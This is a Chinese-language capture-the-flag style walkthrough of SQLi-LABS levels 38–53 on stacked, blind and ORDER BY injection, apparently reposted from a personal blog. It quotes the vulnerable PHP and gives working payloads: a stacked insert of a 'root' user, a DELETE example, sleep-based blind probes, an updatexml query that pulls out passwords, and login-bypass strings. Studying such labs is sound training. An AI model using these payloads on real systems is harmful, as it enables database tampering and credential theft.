SQLi-LABS Page-3 (Stacked Injections)

admin
admin
admin
102359
文章
87
评论
2022年1月6日01:39:56评论29 views字数 2764阅读9分12秒阅读模式

SQLi-LABS3

Less-38

堆叠查询

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}
else 
    {
	echo '<font size="5" color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</font>";  
    }
/* close connection */
mysqli_close($con1);


}

tips:
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
answer:

1
 
http://192.168.3.7/sqli/Less-38/?id=1';insert into users(id,username,password) values (120,'root','root')--+

Less-39

整形堆叠查询

Less-40

同上,’)闭合,并且错误不回显

Less-41

同上,无闭合,错误不回显

Less-42

登录密码输入框那里存在堆叠注入 

1
2
 
username=a' or 1#
password=a

登录失败,下面换成password试试:

1
2
 
username=a
password=a' or 1#

登录成功,所以password没有经过过滤,所以在这进行构造

Less-43

跟上题一样思路,’)闭合

Less-44

与42关基本一样,区别在:没有回显信息 

1
2
3
 
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Less-45

且为 ‘) 闭合

Less-46

order by 延迟注入 

1
2
3
4
 
$id=$_GET['sort'];	

$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);

sort=1 desc 或者asc。显示的结果不同,所以可以注入
看看在MySQL 5中的SELECT语法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
SELECT 
    [ALL | DISTINCT | DISTINCTROW ] 
      [HIGH_PRIORITY] 
      [STRAIGHT_JOIN] 
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
    select_expr [, select_expr ...] 
    [FROM table_references 
    [WHERE where_condition] 
    [GROUP BY {col_name | expr | position} 
      [ASC | DESC], ... [WITH ROLLUP]] 
    [HAVING where_condition] 
    [ORDER BY {col_name | expr | position} 
      [ASC | DESC], ...] 
    [LIMIT {[offset,] row_count | row_count OFFSET offset}] 
    [PROCEDURE procedure_name(argument_list)] 
    [INTO OUTFILE 'file_name' export_options 
      | INTO DUMPFILE 'file_name' 
      | INTO var_name [, var_name]] 
    [FOR UPDATE | LOCK IN SHARE MODE]]

盲注
基于时间的盲注

1
2
 
http://192.168.3.7/sqli/Less-46/?sort=if(1=1,sleep(3),1) %23
http://192.168.3.7/sqli/Less-46/?sort=if(1=2,sleep(3),1) %23

基于布尔的盲注

报错注入 

1
 
http://192.168.3.7/sqli/Less-46/?sort=updatexml(1,substr(concat(0x23,(select group_concat(password) from users ),0x23),65,96),1)%23

Less-47

如上 ,单引号闭合

Less-48

order by 时间盲注 

1
 
http://192.168.3.7/sqli/Less-48/?sort=if(1=1,sleep(3),1) %23

Less-49

同上 单引号闭合

Less-50

order by 堆叠查询

Less-51

堆叠查询

Less-52

堆叠查询

Less-53

堆叠查询

FROM :blog.cfyqy.com | Author:cfyqy

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:39:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQLi-LABS Page-3 (Stacked Injections)http://cn-sec.com/archives/722150.html

发表评论

匿名网友 填写信息